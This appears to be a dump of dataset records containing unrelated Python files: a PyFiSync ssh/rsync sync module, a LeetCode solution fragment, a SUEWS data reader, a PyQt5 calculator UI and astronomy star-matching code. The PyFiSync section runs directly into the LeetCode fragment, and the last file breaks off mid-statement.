+ ' _api file_list\"'\n else:\n cmd += os.path.join(config.PyFiSync_path,'PyFiSync.py _api file_list\"')\n \n \n remote_config = dict()\n \n remote_config['path'] = config.pathB\n remote_config['excludes'] = list(set(config.excludes))\n remote_config['empty'] = empty\n remote_config['attributes'] = list(set(attributes))\n remote_config['copy_symlinks_as_links'] = config.copy_symlinks_as_links\n remote_config['git_exclude'] = config.git_exclude\n remote_config['use_hash_db'] = config.use_hash_db\n \n log.add('Calling for remote file list')\n \n # Encode the config. 
Just in case there is any additional cruft, add\n # a starting sentinel\n sentinel = _randstr(N=10).encode('ascii')\n cmd = shlex.split(cmd)\n cmd[-1] += ' ' + sentinel.decode('ascii') # Add the sentinel to the final command\n \n json_config = sentinel+json.dumps(remote_config,ensure_ascii=False).encode('utf8')\n \n # Use a tempfile to prevent a buffering issue\n outfile = tempfile.NamedTemporaryFile(mode='wb',delete=False)\n \n proc = subprocess.Popen(cmd,stdin=subprocess.PIPE, \n stdout=outfile,\n stderr=subprocess.PIPE, \n bufsize=1,shell=False) \n _,err = proc.communicate(json_config)\n \n if len(err)>0:\n err = utils.to_unicode(err)\n log.add('Remote Call returned warnings:')\n log.space = 4\n log.add(err)\n log.space = 0\n\n # Read back the output, find the sentinel, decompress and return the output\n with open(outfile.name,'rb') as F:\n out = F.read()\n out = out[out.find(sentinel) + len(sentinel):]\n\n try:\n out = zlib.decompress(out) \n except:\n return\n \n return json.loads(out)\n\n def apply_queue(self,queue,force=False):\n \"\"\"\n Remote call to apply queue assuming B is remote\n \"\"\"\n log = self.log\n config = self.config\n\n if len(queue) == 0:\n log.add(' >> No remote actions <<')\n return\n\n sentinel = _randstr(N=10).encode('ascii')\n \n queue_bytes = json.dumps(queue,ensure_ascii=False).encode('utf8')\n \n # Construct the command\n cmd = 'ssh {sm} -p {ssh_port:d} -q {userhost:s} \"'.format(\n sm=self.sm,**config.__dict__)\n\n # construct the call cmd\n if len(config.PyFiSync_path) == 0:\n cmd += 'PyFiSync _api apply_queue'\n else:\n cmd += config.remote_program + ' '\n if any(config.PyFiSync_path.endswith('PyFiSync'+ext) for ext in ['','.py']):\n cmd += config.PyFiSync_path + ' _api apply_queue'\n else:\n cmd += os.path.join(config.PyFiSync_path,'PyFiSync.py _api apply_queue')\n \n \n if force:\n cmd += ' --force '\n\n if not config.backup:\n cmd += ' --no-backup '\n\n cmd += ' ' + config.pathB + ' {}\"'.format(sentinel.decode('ascii'))\n\n out = ''\n err = ''\n\n log.space=0\n log.add('\\nApplying queue on remote')\n log.prepend = '> '\n\n started = False\n cmd = shlex.split(cmd)\n proc = subprocess.Popen(cmd,stdin=subprocess.PIPE,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, \n bufsize=1,shell=False)\n \n proc.stdin.write(sentinel + queue_bytes)\n proc.stdin.close()\n \n with proc.stdout as stdout:\n for line in iter(stdout.readline, b''):\n line = utils.to_unicode(line)\n if not started and line.find('START>>>>>>>')>=0:\n started = True\n continue\n\n if line.find('<<<<<<')>=0:\n started = False\n\n if started:\n log.add(line.rstrip())\n\n\n with proc.stderr as stderr:\n for line in iter(stderr.readline, b''):\n err += utils.to_unicode(line)\n proc.wait()\n log.prepend = ''\n if len(err)>0:\n log.add('Remote Call returned warnings:')\n log.space = 4\n log.add(err)\n\n def transfer(self,tqA2B,tqB2A):\n config = self.config\n log = self.log\n\n pwd0 = os.getcwd()\n os.chdir(config.pathA)\n\n # Build the command\n cmd = 'rsync -azvi -hh ' \\\n + '--keep-dirlinks --copy-dirlinks ' # make directory links behave like they were folders\n \n if config.rsync_checksum:\n cmd += '--checksum '\n \n if not config.copy_symlinks_as_links:\n cmd += '--copy-links ' \n \n if len(config.userhost) >0:\n cmd += '-e \"ssh -q -p {p:d} {sm}\" '.format(p=config.ssh_port,sm=self.sm)\n B = '{userhost:s}:{pathB:s}'.format(**config.__dict__)\n else:\n B = '{pathB:s}'.format(**config.__dict__)\n\n cmd += ' --files-from={files:s} {src:s}/ {dest:s}/'\n\n log.add('(using rsync)')\n\n if 
len(tqA2B) > 0:\n\n # A2B\n tmp_file = '/tmp/tqA2B' + _randstr()\n\n for ix,item in enumerate(tqA2B): # Operate on the list IN PLACE\n item = item.encode('utf-8')\n tqA2B[ix] = item\n\n with open(tmp_file,'wb') as F:\n F.write('\\n'.encode('utf-8').join(tqA2B))\n\n cmdA2B = cmd.format(files=tmp_file,src=config.pathA,dest=B)\n\n log.space=1\n log.add('Running rsync A >>> B')\n log.add(' cmd = ' + cmdA2B)\n log.space=4\n\n\n proc = subprocess.Popen(cmdA2B, stdout=subprocess.PIPE, bufsize=1,shell=True)\n with proc.stdout:\n for line in iter(proc.stdout.readline, b''):\n line = self._proc_final_log(line)\n log.add(line)\n\n proc.wait()\n else:\n log.space=1\n log.add('\\nNo A >>> B transfers')\n\n #########\n\n if len(tqB2A) > 0:\n # B2A\n tmp_file = '/tmp/tqB2A' + _randstr()\n for ix,item in enumerate(tqB2A): # Operate on the list IN PLACE\n item = item.encode('utf-8')\n tqB2A[ix] = item\n\n with open(tmp_file,'wb') as F:\n F.write('\\n'.encode('utf-8').join(tqB2A))\n\n cmdB2A = cmd.format(files=tmp_file,dest=config.pathA,src=B)\n\n log.space=1\n log.add('\\nRunning rsync A <<< B')\n log.add(' cmd = ' + cmdB2A)\n log.space=4\n\n proc = subprocess.Popen(cmdB2A, stdout=subprocess.PIPE, bufsize=1,shell=True)\n with proc.stdout:\n for line in iter(proc.stdout.readline, b''):\n line = self._proc_final_log(line)\n log.add(line)\n\n proc.wait()\n else:\n log.space=1\n log.add('\\nNo A <<< B transfers')\n\n os.chdir(pwd0)\n\n\n def _proc_final_log(self,line):\n line = line.strip()\n if len(line) == 0: return None\n try:\n line = utils.to_unicode(line)\n except:\n return None\n try:\n action_path = [i.strip() for i in line.split(' ',1)]\n except UnicodeDecodeError: # A bit of a hack but this works to make py2 happy\n action_path = [utils.to_unicode(a) for a in line.decode('utf8').split(' ')]\n \n if len(action_path) != 2:\n return 'could not parse action: {:s}'.format(line)\n\n action = action_path[0]\n path = action_path[1]\n\n action = action.replace('<','>')\n\n if action.startswith('sent'):\n return '\\n' + line\n if action.startswith('total'):\n return line\n\n if any([action.startswith(d) for d in ['receiving','building']]):\n return None\n\n if action.startswith('>'): return 'Transfer ' + path\n if action.startswith('cd'): return 'mkdir ' + path\n if action.startswith('cL'): return 'link ' + path\n if action.startswith('.'): return None\n\n return line\n\n @staticmethod\n def cli(argv):\n from . import PFSwalk\n from . 
import main\n \n mode = argv[0]\n argv = argv[1:]\n if mode == 'file_list':\n # Get the sentinel\n sentinel = argv[0].encode('ascii')\n \n # For python3 to read bytes\n stdin = sys.stdin\n if hasattr(stdin,'buffer'):\n stdin = stdin .buffer\n stdout = sys.stdout\n if hasattr(stdout,'buffer'):\n stdout = stdout.buffer\n \n # Read the config, find and cut up to the sentinel, convert to \n # unicode and json load\n \n \n remote_config_bytes = stdin.read() \n remote_config_bytes = remote_config_bytes[remote_config_bytes.find(sentinel)+len(sentinel):]\n remote_config_bytes = remote_config_bytes.decode('utf8')\n remote_config = json.loads(remote_config_bytes)\n \n # Process the input\n path = remote_config['path']\n config = utils.configparser()\n config.pathA = path\n\n sha1 = 'sha1' in remote_config['attributes']\n empty = remote_config['empty']\n config.copy_symlinks_as_links = remote_config['copy_symlinks_as_links']\n config.git_exclude = remote_config['git_exclude']\n config.excludes = list(set(config.excludes + remote_config['excludes']))\n config.use_hash_db = remote_config['use_hash_db']\n \n # Generate the list. This may raise errors so do not start\n # capture until later\n log = utils.logger(silent=True,path=None)\n _tmp = PFSwalk.file_list(path,config,log,sha1=sha1,empty=empty,\n use_hash_db=config.use_hash_db)\n flist = _tmp.files()\n\n out = json.dumps(flist,ensure_ascii=False)\n out = zlib.compress(out.encode('utf8'),9) # Compress it\n \n stdout.write(sentinel + out) # write the bytes\n \n elif mode == 'apply_queue':\n import getopt # Even though it is \"old school\" use getopt here \n # since it is easier and this interface is never \n # exposed to the user\n # For python3 to read bytes\n stdin = sys.stdin\n if hasattr(stdin,'buffer'):\n stdin = stdin.buffer\n stdout = sys.stdout\n if hasattr(stdout,'buffer'):\n stdout = stdout.buffer\n \n try:\n opts, args = getopt.getopt(argv, \"\",['force','no-backup'])\n except getopt.GetoptError as err:\n print(str(err)) #print error\n sys.exit(2)\n\n path,sentinel = args\n\n config = utils.configparser()\n config.pathA = path\n\n # Place the config into PyFiSync\n main.config = config\n\n force = False\n for opt,val in opts:\n if opt == '--force':\n force = True\n if opt == '--no-backup':\n config.backup = False\n\n log = utils.logger(path=path,silent=False)\n\n sys.stdout.write('START>>>>>>>\\n')\n\n # Get the queue from stdin\n sentinel = sentinel.encode('ascii')\n queue = stdin.read()\n queue = queue[queue.find(sentinel)+len(sentinel):]\n queue = queue.decode('utf8')\n\n try:\n queue = json.loads(queue)\n except Exception as E:\n sys.stderr.write('could not parse input. Error: \"{}\"'.format(E))\n sys.exit(2)\n\n print('Successfully loading action queue of {:d} items'.format(len(queue)))\n\n main.apply_action_queue(path,queue,force=force)\n\n sys.stdout.write('\\n<<<<<< 1]\n\t\t\tres = len(dic_tmp)\n\t\t\treturn res\n\t\telif k > 0:\n\t\t\tnums = set(nums)\n\t\t\tnums_tmp = set([n+k for n in nums])\n\t\t\tres = len(nums & nums_tmp)\n\t\t\treturn res\n\t\telse:\n\t\t\treturn 0\n","sub_path":"501-600/532-k-diff-pairs-in-an-array.py","file_name":"532-k-diff-pairs-in-an-array.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"434713772","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jun 26 13:10:35 2018\n\n@author: TZQ88888\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nheaders='''\nxSurf\nxFlux\nk*us*avdens*avcp\nk\nus\navdens\navcp\nxFlux/(k*us*avdens*avcp)\n(LOG(z2zd/z0h)-psyhz2+psyhz0)\nLOG(z2zd/z0h)\nz2zd\nL_mod\nz0h\nz2zd/L_mod\npsyhz2\npsyhz0\npsyhz2-psyhz0\nxDiag\nCH\n'''\ndf=pd.read_csv('ch1.txt',sep='\\s+',skipinitialspace=True,header=None)\ndf=df.values.reshape(-1,19)\ndf1=pd.DataFrame(data=df,columns=headers.split('\\n')[1:-1])\ndf1.to_csv('ch_diag.csv',index=None,sep='\\t')","sub_path":"SUEWS_simulation/Archive/T2-debug/qh_check/ch_read.py","file_name":"ch_read.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"419534764","text":"from PyQt5 import QtCore, QtGui, QtWidgets\nimport sys\nclass Ui_MainCalcWindow(object):\n def setup_ui(self, MainCalcWindow):\n MainCalcWindow.setObjectName(\"MainCalcWindow\")\n MainCalcWindow.resize(505, 600)\n MainCalcWindow.setTabShape(QtWidgets.QTabWidget.Rounded)\n MainCalcWindow.setWindowTitle(\"Simple Calculator\")\n self.calc_widget = QtWidgets.QWidget(MainCalcWindow)\n self.calc_widget.setObjectName(\"calc_widget\")\n self.verticalLayoutWidget = QtWidgets.QWidget(self.calc_widget)\n self.verticalLayoutWidget.setGeometry(QtCore.QRect(10, 10, 484, 601))\n self.verticalLayoutWidget.setObjectName(\"verticalLayoutWidget\")\n self.main_vert_layout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)\n self.main_vert_layout.setContentsMargins(0, 0, 0, 0)\n self.main_vert_layout.setSpacing(0)\n self.main_vert_layout.setObjectName(\"main_vert_layout\") \n self.lcd_label = QtWidgets.QLabel(self.verticalLayoutWidget)\n self.lcd_label.setMinimumSize(QtCore.QSize(0, 100))\n self.lcd_label.setMaximumSize(QtCore.QSize(16777215, 100))\n font = QtGui.QFont()\n font.setFamily(\"Tlwg Typist\")\n font.setPointSize(36)\n font.setBold(False)\n font.setItalic(False)\n font.setWeight(50)\n self.lcd_label.setFont(font)\n self.lcd_label.setFrameShape(QtWidgets.QFrame.Box)\n self.lcd_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)\n self.lcd_label.setObjectName(\"lcd_label\")\n self.main_vert_layout.addWidget(self.lcd_label)\n self.btn_grid_layout = QtWidgets.QGridLayout()\n self.btn_grid_layout.setSpacing(0)\n self.btn_grid_layout.setObjectName(\"btn_grid_layout\")\n self.btn_four = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_four.sizePolicy().hasHeightForWidth())\n self.btn_four.setSizePolicy(sizePolicy)\n self.btn_four.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_four.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_four.setObjectName(\"btn_four\")\n self.btn_grid_layout.addWidget(self.btn_four, 1, 0, 1, 1)\n self.btn_subtract = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_subtract.sizePolicy().hasHeightForWidth())\n self.btn_subtract.setSizePolicy(sizePolicy)\n self.btn_subtract.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_subtract.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_subtract.setDefault(False)\n self.btn_subtract.setObjectName(\"btn_subtract\")\n self.btn_grid_layout.addWidget(self.btn_subtract, 1, 3, 1, 1)\n self.btn_multiply = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_multiply.sizePolicy().hasHeightForWidth())\n self.btn_multiply.setSizePolicy(sizePolicy)\n self.btn_multiply.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_multiply.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_multiply.setDefault(False)\n self.btn_multiply.setObjectName(\"btn_multiply\")\n self.btn_grid_layout.addWidget(self.btn_multiply, 2, 3, 1, 1)\n self.btn_five = 
QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_five.sizePolicy().hasHeightForWidth())\n self.btn_five.setSizePolicy(sizePolicy)\n self.btn_five.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_five.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_five.setObjectName(\"btn_five\")\n self.btn_grid_layout.addWidget(self.btn_five, 1, 1, 1, 1)\n self.btn_nine = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_nine.sizePolicy().hasHeightForWidth())\n self.btn_nine.setSizePolicy(sizePolicy)\n self.btn_nine.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_nine.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_nine.setObjectName(\"btn_nine\")\n self.btn_grid_layout.addWidget(self.btn_nine, 0, 2, 1, 1)\n self.btn_clear = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_clear.sizePolicy().hasHeightForWidth())\n self.btn_clear.setSizePolicy(sizePolicy)\n self.btn_clear.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_clear.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_clear.setDefault(False)\n self.btn_clear.setObjectName(\"btn_clear\")\n self.btn_grid_layout.addWidget(self.btn_clear, 4, 0, 1, 1)\n self.btn_zero = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_zero.sizePolicy().hasHeightForWidth())\n self.btn_zero.setSizePolicy(sizePolicy)\n self.btn_zero.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_zero.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_zero.setObjectName(\"btn_zero\")\n self.btn_grid_layout.addWidget(self.btn_zero, 4, 1, 1, 1)\n self.btn_three = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_three.sizePolicy().hasHeightForWidth())\n self.btn_three.setSizePolicy(sizePolicy)\n self.btn_three.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_three.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_three.setObjectName(\"btn_three\")\n self.btn_grid_layout.addWidget(self.btn_three, 2, 2, 1, 1)\n self.btn_one = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_one.sizePolicy().hasHeightForWidth())\n self.btn_one.setSizePolicy(sizePolicy)\n self.btn_one.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_one.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_one.setObjectName(\"btn_one\")\n self.btn_grid_layout.addWidget(self.btn_one, 2, 0, 1, 1)\n self.btn_add = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = 
QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_add.sizePolicy().hasHeightForWidth())\n self.btn_add.setSizePolicy(sizePolicy)\n self.btn_add.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_add.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_add.setDefault(False)\n self.btn_add.setObjectName(\"btn_add\")\n self.btn_grid_layout.addWidget(self.btn_add, 0, 3, 1, 1)\n self.btn_seven = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_seven.sizePolicy().hasHeightForWidth())\n self.btn_seven.setSizePolicy(sizePolicy)\n self.btn_seven.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_seven.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_seven.setObjectName(\"btn_seven\")\n self.btn_grid_layout.addWidget(self.btn_seven, 0, 0, 1, 1)\n self.btn_divide = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_divide.sizePolicy().hasHeightForWidth())\n self.btn_divide.setSizePolicy(sizePolicy)\n self.btn_divide.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_divide.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_divide.setAutoDefault(False)\n self.btn_divide.setDefault(False)\n self.btn_divide.setFlat(False)\n self.btn_divide.setObjectName(\"btn_divide\")\n self.btn_grid_layout.addWidget(self.btn_divide, 4, 3, 1, 1)\n self.btn_equals = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_equals.sizePolicy().hasHeightForWidth())\n self.btn_equals.setSizePolicy(sizePolicy)\n self.btn_equals.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_equals.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_equals.setObjectName(\"btn_equals\")\n self.btn_grid_layout.addWidget(self.btn_equals, 4, 2, 1, 1)\n self.btn_six = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_six.sizePolicy().hasHeightForWidth())\n self.btn_six.setSizePolicy(sizePolicy)\n self.btn_six.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_six.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_six.setObjectName(\"btn_six\")\n self.btn_grid_layout.addWidget(self.btn_six, 1, 2, 1, 1)\n self.btn_two = QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_two.sizePolicy().hasHeightForWidth())\n self.btn_two.setSizePolicy(sizePolicy)\n self.btn_two.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_two.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_two.setObjectName(\"btn_two\")\n self.btn_grid_layout.addWidget(self.btn_two, 2, 1, 1, 1)\n self.btn_eight = 
QtWidgets.QPushButton(self.verticalLayoutWidget)\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(self.btn_eight.sizePolicy().hasHeightForWidth())\n self.btn_eight.setSizePolicy(sizePolicy)\n self.btn_eight.setMinimumSize(QtCore.QSize(120, 100))\n self.btn_eight.setMaximumSize(QtCore.QSize(120, 80))\n self.btn_eight.setObjectName(\"btn_eight\")\n self.btn_grid_layout.addWidget(self.btn_eight, 0, 1, 1, 1)\n self.main_vert_layout.addLayout(self.btn_grid_layout)\n spacerItem = QtWidgets.QSpacerItem(20, 20, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)\n self.main_vert_layout.addItem(spacerItem)\n MainCalcWindow.setCentralWidget(self.calc_widget)\n\n self.retranslate_ui(MainCalcWindow)\n QtCore.QMetaObject.connectSlotsByName(MainCalcWindow)\n\n def retranslate_ui(self, MainCalcWindow):\n _translate = QtCore.QCoreApplication.translate \n self.btn_four.setText(_translate(\"MainCalcWindow\", \"4\"))\n self.btn_subtract.setText(_translate(\"MainCalcWindow\", \"-\"))\n self.btn_multiply.setText(_translate(\"MainCalcWindow\", \"*\"))\n self.btn_five.setText(_translate(\"MainCalcWindow\", \"5\"))\n self.btn_nine.setText(_translate(\"MainCalcWindow\", \"9\"))\n self.btn_clear.setText(_translate(\"MainCalcWindow\", \"AC\"))\n self.btn_zero.setText(_translate(\"MainCalcWindow\", \"0\"))\n self.btn_three.setText(_translate(\"MainCalcWindow\", \"3\"))\n self.btn_one.setText(_translate(\"MainCalcWindow\", \"1\"))\n self.btn_add.setText(_translate(\"MainCalcWindow\", \"+\"))\n self.btn_seven.setText(_translate(\"MainCalcWindow\", \"7\"))\n self.btn_divide.setText(_translate(\"MainCalcWindow\", \"/\"))\n self.btn_equals.setText(_translate(\"MainCalcWindow\", \"=\"))\n self.btn_six.setText(_translate(\"MainCalcWindow\", \"6\"))\n self.btn_two.setText(_translate(\"MainCalcWindow\", \"2\"))\n self.btn_eight.setText(_translate(\"MainCalcWindow\", \"8\"))\n\n","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":13763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"248556576","text":"import numpy as np\nimport glob\nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import MultipleLocator\nplt.rcParams['figure.dpi'] = 300 #分辨率\nplt.rc('font',family='Times New Roman') ### 设置新字体\nfile_path = '/home/lab30202/lq/ai_future/low_exporsure_emsemble/fpn_resnet_detnet_v2/validation'\nthresholds = [0.4,0.5,0.6]\n\ndef sex_list_match(sex_img,list_img,section_target_num):\n ### matching\n match_num = 0\n match = 0\n det_target = sex_img.shape[0]\n number_target = section_target_num\n match_value = 1.5\n match_list = []\n for i in range(det_target):\n match_single = 0\n x_axis = sex_img[i][1]\n y_axis = sex_img[i][2]\n for j in range(number_target):\n if abs(x_axis - list_img[j][1]) <= match_value and abs(y_axis - list_img[j][2]) <= match_value:\n match_num += 1\n match += 1\n match_single += 1\n match_list.append(match_single)\n if match_num > number_target:\n match_num = number_target\n precision = match_num / det_target\n if number_target != 0:\n recall = match/number_target\n else:\n recall = 1\n precision = 1\n return precision,recall\n\n\ndef det_list_match(det_img,list_img,section_target_num):\n ### matching\n match_num = 0\n match = 0\n det_target = det_img.shape[0]\n number_target = section_target_num\n match_value = 1.5\n for i in range(det_target):\n x_axis = (det_img[i][0]+det_img[i][2])/2\n y_axis = (det_img[i][1]+det_img[i][3])/2\n for j in range(number_target):\n if abs(x_axis - list_img[j][1]) <= match_value and abs(y_axis - list_img[j][2]) <= match_value:\n match_num += 1\n match += 1\n if match_num > number_target:\n match_num = number_target\n precision = match_num/det_target\n if number_target != 0:\n recall = match/number_target\n else:\n recall = 1\n precision = 1\n\n return precision,recall\ndef compute_section_target(list_list_img):\n mag9_10 = 0\n mag10_11 = 0\n mag11_12 = 0\n mag12_13 = 0\n mag13_14 = 0\n mag14_15 = 0\n mag15_16 = 0\n mag16_17 = 0\n mag17_18 = 0\n mag18_19 = 0\n mag19_20 = 0\n mag20_21 = 0\n mag21_22 = 0\n mag22_23 = 0\n mag23_24 = 0\n mag24_25 = 0\n mag9_10_list = []\n mag10_11_list = []\n mag11_12_list = []\n mag12_13_list = []\n mag13_14_list = []\n mag14_15_list = []\n mag15_16_list = []\n mag16_17_list = []\n mag17_18_list = []\n mag18_19_list = []\n mag19_20_list = []\n mag20_21_list = []\n mag21_22_list = []\n mag22_23_list = []\n mag23_24_list = []\n mag24_25_list = []\n\n for step,value in enumerate(list_list_img):\n if 9 <= value[3] < 10:\n mag9_10 += 1\n mag9_10_list.append(value)\n if 10 <= value[3] < 11:\n mag10_11 += 1\n mag10_11_list.append(value)\n if 11 <= value[3] < 12:\n mag11_12 += 1\n mag11_12_list.append(value)\n if 12 <= value[3] < 13:\n mag12_13 += 1\n mag12_13_list.append(value)\n if 13 <= value[3] < 14:\n mag13_14 += 1\n mag13_14_list.append(value)\n if 14 <= value[3] < 15:\n mag14_15 += 1\n mag14_15_list.append(value)\n elif 15 <= value[3] < 16:\n mag15_16 += 1\n mag15_16_list.append(value)\n elif 16 <= value[3] < 17:\n mag16_17 += 1\n mag16_17_list.append(value)\n elif 17 <= value[3] < 18:\n mag17_18 += 1\n mag17_18_list.append(value)\n elif 18 <= value[3] < 19:\n mag18_19 += 1\n mag18_19_list.append(value)\n elif 19 <= value[3] < 20:\n mag19_20 += 1\n mag19_20_list.append(value)\n elif 20 <= value[3] < 21:\n mag20_21 += 1\n mag20_21_list.append(value)\n elif 21 <= value[3] < 22:\n mag21_22 += 1\n mag21_22_list.append(value)\n elif 22 <= value[3] < 23:\n mag22_23 += 1\n mag22_23_list.append(value)\n elif 23 <= value[3] < 24:\n mag23_24 += 1\n 
mag23_24_list.append(value)\n elif 24 <= value[3] < 25:\n mag24_25 += 1\n mag24_25_list.append(value)\n mag9_10_list = np.array(mag9_10_list)\n mag10_11_list = np.array(mag10_11_list)\n mag11_12_list = np.array(mag11_12_list)\n mag12_13_list = np.array(mag12_13_list)\n mag13_14_list = np.array(mag13_14_list)\n\n mag14_15_list = np.array(mag14_15_list)\n mag15_16_list = np.array(mag15_16_list)\n mag16_17_list = np.array(mag16_17_list)\n mag17_18_list = np.array(mag17_18_list)\n mag18_19_list = np.array(mag18_19_list)\n mag19_20_list = np.array(mag19_20_list)\n mag20_21_list = np.array(mag20_21_list)\n mag21_22_list = np.array(mag21_22_list)\n mag22_23_list = np.array(mag22_23_list)\n mag23_24_list = np.array(mag23_24_list)\n mag24_25_list = np.array(mag24_25_list)\n return \tmag9_10,mag10_11,mag11_12,mag12_13,mag13_14,mag14_15 ,mag15_16 ,mag16_17,mag17_18,mag18_19,\\\n 